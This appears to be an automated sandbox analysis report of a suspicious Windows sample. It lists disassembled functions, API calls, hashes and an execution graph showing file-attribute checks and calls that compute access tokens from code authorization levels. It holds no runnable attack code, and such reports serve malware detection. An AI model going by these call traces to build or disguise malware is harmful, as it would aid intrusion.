                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise___std_exception_copy
                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                  • API String ID: 3109751735-1866435925
                                                                                                  • Opcode ID: 899c950e3bc70fbb904d2f7bcd87e18dd7a3b6a4d27dd6dbf2993709a60e0109
                                                                                                  • Instruction ID: e7e03be48d71753f69dd2cdedc275f4c3e599495887be0577dbab8c8fb1d8270
                                                                                                  • Opcode Fuzzy Hash: 899c950e3bc70fbb904d2f7bcd87e18dd7a3b6a4d27dd6dbf2993709a60e0109
                                                                                                  • Instruction Fuzzy Hash: 0B1105B29003056BCB10DF68D801E96B7DEEF15310F04C52AF9589B641FB70A901CBA4
                                                                                                  Function 0067C862 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0067C813,00000000,?,006A05B4,?,?,?,0067C9B6,00000004,InitializeCriticalSectionEx,00695BE8,InitializeCriticalSectionEx), ref: 0067C86F
                                                                                                  • GetLastError.KERNEL32(?,0067C813,00000000,?,006A05B4,?,?,?,0067C9B6,00000004,InitializeCriticalSectionEx,00695BE8,InitializeCriticalSectionEx,00000000,?,0067C76D), ref: 0067C879
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0067C8A1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                  • String ID: api-ms-
                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                  • Opcode ID: dd7e09d443bfea220b1d0d7da02d8d48e69b71b69090310c990c16890378e91b
                                                                                                  • Instruction ID: a509ac1fd1fda06e8ad9f5cd678631b24d96b592fd4408ba055b1a527ad37596
                                                                                                  • Opcode Fuzzy Hash: dd7e09d443bfea220b1d0d7da02d8d48e69b71b69090310c990c16890378e91b
                                                                                                  • Instruction Fuzzy Hash: 5EE04F70284205FBEF202FA0EC06F5D3E5BAB40B65F108135FB0DA95E1EB619821D696
                                                                                                  Function 00687C8A Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetConsoleOutputCP.KERNEL32(EBD99D41,00000000,00000000,00000000), ref: 00687CED
                                                                                                    • Part of subcall function 0068AA63: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000001,?,00000000,?,?,?,006855AD,?,00000000,?), ref: 0068AAC4
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00687F3F
                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00687F85
                                                                                                  • GetLastError.KERNEL32 ref: 00688028
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 2112829910-0
                                                                                                  • Opcode ID: 724b35e8c504feb8ad11906e19a0ddc771f34d76fdd5a4231ae9c4c46684bca3
                                                                                                  • Instruction ID: 8e1be8d23dfbad2ad1179fd89d227bcb1b32623a4bd094684b99f48d0b666c23
                                                                                                  • Opcode Fuzzy Hash: 724b35e8c504feb8ad11906e19a0ddc771f34d76fdd5a4231ae9c4c46684bca3
                                                                                                  • Instruction Fuzzy Hash: F1D17D75D042489FDF15DFE8C8809EDBBB6EF49300F24466AE515EB351D630E946CB50
                                                                                                  Function 0067B831 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AdjustPointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 1740715915-0
                                                                                                  • Opcode ID: 5ebafab0230d0b2a89a31f5056a77c4b2708b06bd76471f37a20f44ec4efff47
                                                                                                  • Instruction ID: 72b305a8176ad120690155cd51b08e83daaa3b88ec22692e90db8a629265a779
                                                                                                  • Opcode Fuzzy Hash: 5ebafab0230d0b2a89a31f5056a77c4b2708b06bd76471f37a20f44ec4efff47
                                                                                                  • Instruction Fuzzy Hash: 7F510472A042069FEB289F10C841BBA77AAFF45711F14D12DEA2D97391E731ED81CB94
                                                                                                  Function 0068AE20 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0068AA63: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000001,?,00000000,?,?,?,006855AD,?,00000000,?), ref: 0068AAC4
                                                                                                  • GetLastError.KERNEL32 ref: 0068AE84
                                                                                                  • __dosmaperr.LIBCMT ref: 0068AE8B
                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 0068AEC5
                                                                                                  • __dosmaperr.LIBCMT ref: 0068AECC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1913693674-0
                                                                                                  • Opcode ID: 55252d30285dfeea8ffd00cf73b5eb400ac5887814cb1f425ab5331b8f6336b1
                                                                                                  • Instruction ID: 292b2cd75f384fe7e944b0c4e5cce37cd188913c0e0f6c77994272b2ef69500a
                                                                                                  • Opcode Fuzzy Hash: 55252d30285dfeea8ffd00cf73b5eb400ac5887814cb1f425ab5331b8f6336b1
                                                                                                  • Instruction Fuzzy Hash: 1221AF31600605AFAB60BFA5888596BB7AFEF443647108F1AFD1997210D730EC51ABA2
                                                                                                  Function 0068139F Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7132251cafbd2fc9657a2257c55eb89a4e59b8f626d98c9ab4477339fbfd8eb2
                                                                                                  • Instruction ID: 0be33bbb444567925f79b12743801e0bad3c31168bbd99dfad2f55971efbb0ed
                                                                                                  • Opcode Fuzzy Hash: 7132251cafbd2fc9657a2257c55eb89a4e59b8f626d98c9ab4477339fbfd8eb2
                                                                                                  • Instruction Fuzzy Hash: CA21A131204205AF9B60BFA19C80DAA77EFAF463647108B19F9159B651DB31EC4287A0
                                                                                                  Function 0068BDC1 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0068BDC9
                                                                                                    • Part of subcall function 0068AA63: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000001,?,00000000,?,?,?,006855AD,?,00000000,?), ref: 0068AAC4
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0068BE01
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0068BE21
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 158306478-0
                                                                                                  • Opcode ID: 483df4102c20ed97d42d33909e2c406127a0d18650b3e7f134c07a1b453f4091
                                                                                                  • Instruction ID: f0ce707d2a7a0f9582ff5e7313786ef00e5e2e78384d390045d752d49059a057
                                                                                                  • Opcode Fuzzy Hash: 483df4102c20ed97d42d33909e2c406127a0d18650b3e7f134c07a1b453f4091
                                                                                                  • Instruction Fuzzy Hash: CF1184B15026167E67213BB65CCEDEF6E6FEE457D8310262AFB0191201EF64CD0287B9
                                                                                                  Function 00691C73 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0069066A,00000000,00000001,0000000C,00000000,?,0068807C,00000000,00000000,00000000), ref: 00691C8A
                                                                                                  • GetLastError.KERNEL32(?,0069066A,00000000,00000001,0000000C,00000000,?,0068807C,00000000,00000000,00000000,00000000,00000000,?,0068861F,?), ref: 00691C96
                                                                                                    • Part of subcall function 00691C5C: CloseHandle.KERNEL32(FFFFFFFE,00691CA6,?,0069066A,00000000,00000001,0000000C,00000000,?,0068807C,00000000,00000000,00000000,00000000,00000000), ref: 00691C6C
                                                                                                  • ___initconout.LIBCMT ref: 00691CA6
                                                                                                    • Part of subcall function 00691C1E: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00691C4D,00690657,00000000,?,0068807C,00000000,00000000,00000000,00000000), ref: 00691C31
                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0069066A,00000000,00000001,0000000C,00000000,?,0068807C,00000000,00000000,00000000,00000000), ref: 00691CBB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                  • String ID:
                                                                                                  • API String ID: 2744216297-0
                                                                                                  • Opcode ID: 3b86759b8bb190e4d1e3a700ceb425526a8db8214075ffaf1e4c7a188195336d
                                                                                                  • Instruction ID: 70d5f785dbe76d7ead07aecee8e5c8acd9a0aa22f0dc548bb3fdf5f818a51e99
                                                                                                  • Opcode Fuzzy Hash: 3b86759b8bb190e4d1e3a700ceb425526a8db8214075ffaf1e4c7a188195336d
                                                                                                  • Instruction Fuzzy Hash: B1F0303614151AFFCF222F91ED05E993F6FFB193A1F115411FA19C9A30CA328C61AB94
                                                                                                  Function 00671F10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 0067209F
                                                                                                    • Part of subcall function 006796FD: RaiseException.KERNEL32(E06D7363,00000001,00000003,0067125C,?,?,?,?,0067125C,?,0069DFCC), ref: 0067975D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise___std_exception_copy
                                                                                                  • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                  • API String ID: 3109751735-1240500531
                                                                                                  • Opcode ID: 92b8d6c6a958b9bd064ed5adc9477471e6189b3f01c4f25769daeb8bef02d9fa
                                                                                                  • Instruction ID: a017ad2b856944997a3807f4af8ce636575cfbc0e45cd9a9f4383e570b743e87
                                                                                                  • Opcode Fuzzy Hash: 92b8d6c6a958b9bd064ed5adc9477471e6189b3f01c4f25769daeb8bef02d9fa
                                                                                                  • Instruction Fuzzy Hash: 8651F6B5900204ABCB14DF68DC41AAAF7FAFF49310F14C21EF9189B741E774AA01CBA5
                                                                                                  Function 0067B520 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0067B55F
                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0067B613
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 3480331319-1018135373
                                                                                                  • Opcode ID: 2df142555da7cbfbcf5119a1ba9fe7cb380fc9304cf92d6df37746880391406e
                                                                                                  • Instruction ID: f536f462ec738e1b2a5b96a2f9405388d8386b69a9babe7a96281572763ee2c0
                                                                                                  • Opcode Fuzzy Hash: 2df142555da7cbfbcf5119a1ba9fe7cb380fc9304cf92d6df37746880391406e
                                                                                                  • Instruction Fuzzy Hash: D0419234A002099BCF10DF69C885BAEBBB7AF45324F14D159E918AB392D731EA11CF94
                                                                                                  Function 0067BE2D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • EncodePointer.KERNEL32(00000000,?), ref: 0067BE52
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EncodePointer
                                                                                                  • String ID: MOC$RCC
                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                  • Opcode ID: 6f1decd407854bd15da8180773017656c248043ed61c078525c294319ab3fa0b
                                                                                                  • Instruction ID: df6eb3ea8792f6a727941d503356e41496bfaa106a5e373e7386ca478a5c424d
                                                                                                  • Opcode Fuzzy Hash: 6f1decd407854bd15da8180773017656c248043ed61c078525c294319ab3fa0b
                                                                                                  • Instruction Fuzzy Hash: 09415771900209AFCF15DF98CD81BEEBBB6FF48300F1890A9FA08A6211D3359A50DF55
                                                                                                  Function 00671910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0067193B
                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0067198A
                                                                                                    • Part of subcall function 00676616: _Yarn.LIBCPMT ref: 00676635
                                                                                                    • Part of subcall function 00676616: _Yarn.LIBCPMT ref: 00676659
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                  • String ID: bad locale name
                                                                                                  • API String ID: 1908188788-1405518554
                                                                                                  • Opcode ID: 4182ae2b69197ca44dea1a2ae70e90b8f762f5963a42f78622c0feaffcb708a1
                                                                                                  • Instruction ID: f8a4457931488ab26d8ed15be6bd2062b7958b054a47ea40383f02d0bc4613e0
                                                                                                  • Opcode Fuzzy Hash: 4182ae2b69197ca44dea1a2ae70e90b8f762f5963a42f78622c0feaffcb708a1
                                                                                                  • Instruction Fuzzy Hash: 9211A071904B84DFD320CF69C905B5BBBE8EF19710F008A1EE489C7B81E775A504CBA5

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:7.8%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:0.4%
                                                                                                  Total number of Nodes:730
                                                                                                  Total number of Limit Nodes:49
                                                                                                  execution_graph 148955 29d272c 148956 29d26ea 148955->148956 148957 29d273e 148956->148957 148960 29d44f0 148956->148960 148958 29d272a 148961 29d450a 148960->148961 148962 29d452f 148961->148962 148965 29d45b8 148961->148965 148969 29d45a8 148961->148969 148962->148958 148966 29d45cb 148965->148966 148973 29d4620 148966->148973 148970 29d45cb 148969->148970 148972 29d4620 GetFileAttributesW 148970->148972 148971 29d45e9 148971->148962 148972->148971 148974 29d4645 148973->148974 148975 29d45e9 148974->148975 148978 29d4a98 GetFileAttributesW 148974->148978 148975->148962 148976 29d470b 148976->148975 148977 29d4a98 GetFileAttributesW 148976->148977 148977->148975 148978->148976 148979 8337bc0 148980 8337bff 148979->148980 148981 8337c03 148980->148981 148983 83385f8 148980->148983 148984 8338626 148983->148984 148985 833863f 148984->148985 148987 8338330 GetFileAttributesW 148984->148987 148991 833831f 148984->148991 148989 8338330 GetFileAttributesW 148985->148989 148990 833831f GetFileAttributesW 148985->148990 148986 8338680 148986->148980 148987->148985 148989->148986 148990->148986 148992 8338357 148991->148992 148993 833835b 148992->148993 148994 8341830 GetFileAttributesW 148992->148994 148995 8341820 GetFileAttributesW 148992->148995 148993->148985 148994->148993 148995->148993 148713 83409a0 148714 83409c3 148713->148714 148718 8340808 148714->148718 148723 8340869 148714->148723 148715 83409cc 148719 834082d 148718->148719 148720 8340858 148719->148720 148728 81583fc 148719->148728 148736 8158400 148719->148736 148720->148715 148724 8340834 148723->148724 148725 8340858 148724->148725 148726 8158400 GetFileAttributesW 148724->148726 148727 81583fc GetFileAttributesW 148724->148727 148725->148715 148726->148724 148727->148724 148744 29d4a98 148728->148744 148751 29d4af8 148728->148751 148729 815841a 148730 8158420 148729->148730 148734 8158400 GetFileAttributesW 148729->148734 148735 81583fc GetFileAttributesW 148729->148735 148730->148719 148731 815846c 148731->148719 148734->148731 148735->148731 148737 815841a 148736->148737 148740 29d4a98 GetFileAttributesW 148736->148740 148741 29d4af8 GetFileAttributesW 148736->148741 148738 8158420 148737->148738 148742 8158400 GetFileAttributesW 148737->148742 148743 81583fc GetFileAttributesW 148737->148743 148738->148719 148739 815846c 148739->148719 148740->148737 148741->148737 148742->148739 148743->148739 148749 29d4a98 GetFileAttributesW 148744->148749 148750 29d4af8 GetFileAttributesW 148744->148750 148745 29d4ac2 148746 29d4ac8 148745->148746 148756 29d4118 148745->148756 148746->148729 148749->148745 148750->148745 148752 29d4b10 148751->148752 148753 29d4b25 148752->148753 148754 29d4118 GetFileAttributesW 148752->148754 148753->148729 148755 29d4b56 148754->148755 148755->148729 148757 29d4f40 GetFileAttributesW 148756->148757 148759 29d4b56 148757->148759 148759->148729 148996 29dd928 148997 29dd970 ComputeAccessTokenFromCodeAuthzLevel 148996->148997 148998 29dd9ad 148997->148998 148127 83450f2 148128 83450f9 148127->148128 148131 834520f 148128->148131 148130 8345113 148130->148130 148133 8345216 148131->148133 148132 834521a 148132->148130 148133->148132 148136 8336860 148133->148136 148144 8336850 148133->148144 148137 8336898 148136->148137 148139 833689c 148137->148139 148152 83366d9 148137->148152 148162 83366e8 148137->148162 148138 833693d 148172 83365e0 148138->148172 148176 83365d0 148138->148176 148139->148133 148145 8336860 148144->148145 148147 833689c 148145->148147 148150 83366d9 IdentifyCodeAuthzLevelW 148145->148150 148151 83366e8 IdentifyCodeAuthzLevelW 148145->148151 148146 833693d 148148 83365e0 3 API calls 148146->148148 148149 83365d0 3 API calls 148146->148149 148147->148133 148148->148147 148149->148147 148150->148146 148151->148146 148153 8336703 148152->148153 148154 8336731 148153->148154 148156 8336761 148153->148156 148182 8336678 148154->148182 148187 8336688 148154->148187 148155 833675a 148155->148138 148158 83366d9 IdentifyCodeAuthzLevelW 148156->148158 148159 83366e8 IdentifyCodeAuthzLevelW 148156->148159 148157 83367ce 148157->148138 148158->148157 148159->148157 148163 8336703 148162->148163 148164 8336731 148163->148164 148166 8336761 148163->148166 148168 8336678 IdentifyCodeAuthzLevelW 148164->148168 148169 8336688 IdentifyCodeAuthzLevelW 148164->148169 148165 833675a 148165->148138 148170 83366d9 IdentifyCodeAuthzLevelW 148166->148170 148171 83366e8 IdentifyCodeAuthzLevelW 148166->148171 148167 83367ce 148167->148138 148168->148165 148169->148165 148170->148167 148171->148167 148252 833652a 148172->148252 148257 8336538 148172->148257 148173 833661b 148173->148139 148177 8336576 148176->148177 148178 83365da 148176->148178 148177->148139 148180 833652a 3 API calls 148178->148180 148181 8336538 3 API calls 148178->148181 148179 833661b 148179->148139 148180->148179 148181->148179 148183 833668c 148182->148183 148191 29dc7c8 148183->148191 148196 29dc7b8 148183->148196 148184 8336694 148184->148155 148188 8336694 148187->148188 148189 29dc7b8 IdentifyCodeAuthzLevelW 148187->148189 148190 29dc7c8 IdentifyCodeAuthzLevelW 148187->148190 148188->148155 148189->148188 148190->148188 148192 29dc7eb 148191->148192 148193 29dc86f 148192->148193 148201 29dc9d8 148192->148201 148209 29dc9c8 148192->148209 148193->148184 148197 29dc7eb 148196->148197 148198 29dc86f 148197->148198 148199 29dc9d8 IdentifyCodeAuthzLevelW 148197->148199 148200 29dc9c8 IdentifyCodeAuthzLevelW 148197->148200 148198->148184 148199->148198 148200->148198 148202 29dc9ec 148201->148202 148203 29dc9f3 148202->148203 148217 29dcf52 148202->148217 148222 29dcf69 148202->148222 148227 29dce19 148202->148227 148232 29dcf80 148202->148232 148237 29dce28 148202->148237 148203->148193 148210 29dc9ec 148209->148210 148211 29dc9f3 148210->148211 148212 29dce19 IdentifyCodeAuthzLevelW 148210->148212 148213 29dcf69 IdentifyCodeAuthzLevelW 148210->148213 148214 29dce28 IdentifyCodeAuthzLevelW 148210->148214 148215 29dcf80 IdentifyCodeAuthzLevelW 148210->148215 148216 29dcf52 IdentifyCodeAuthzLevelW 148210->148216 148211->148193 148212->148211 148213->148211 148214->148211 148215->148211 148216->148211 148219 29dcecf 148217->148219 148218 29dd000 148218->148203 148242 29dd158 148219->148242 148245 29dd168 148219->148245 148223 29dcecf 148222->148223 148225 29dd158 IdentifyCodeAuthzLevelW 148223->148225 148226 29dd168 IdentifyCodeAuthzLevelW 148223->148226 148224 29dd000 148224->148203 148225->148224 148226->148224 148229 29dce4c 148227->148229 148228 29dce9c 148228->148203 148229->148228 148230 29dd158 IdentifyCodeAuthzLevelW 148229->148230 148231 29dd168 IdentifyCodeAuthzLevelW 148229->148231 148230->148228 148231->148228 148233 29dcecf 148232->148233 148235 29dd158 IdentifyCodeAuthzLevelW 148233->148235 148236 29dd168 IdentifyCodeAuthzLevelW 